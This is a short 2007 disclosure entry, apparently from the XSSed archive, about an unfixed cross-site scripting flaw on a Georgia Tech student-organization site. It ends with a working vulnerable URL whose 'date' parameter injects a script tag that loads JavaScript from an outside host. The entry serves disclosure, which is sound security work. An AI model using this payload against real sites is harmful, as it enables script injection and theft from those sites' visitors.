Unfixed XSS vulnerability at cyberbuzz.gatech.edu

2007-11-06T00:00:00
ID XSSED:9827
Type xssed
Reporter Hotpockets
Modified 2007-12-06T00:00:00

Description

Security researcher Hotpockets, has submitted on 11/06/2007 a cross-site-scripting (XSS) vulnerability affecting cyberbuzz.gatech.edu, which at the time of submission ranked 7390 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/06/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://cyberbuzz.gatech.edu/greekweek/calendar.php?date=%3Cscript+src%3Dhttp://vuln.xssed.net/thirdparty/scripts/hotpockets.js%3E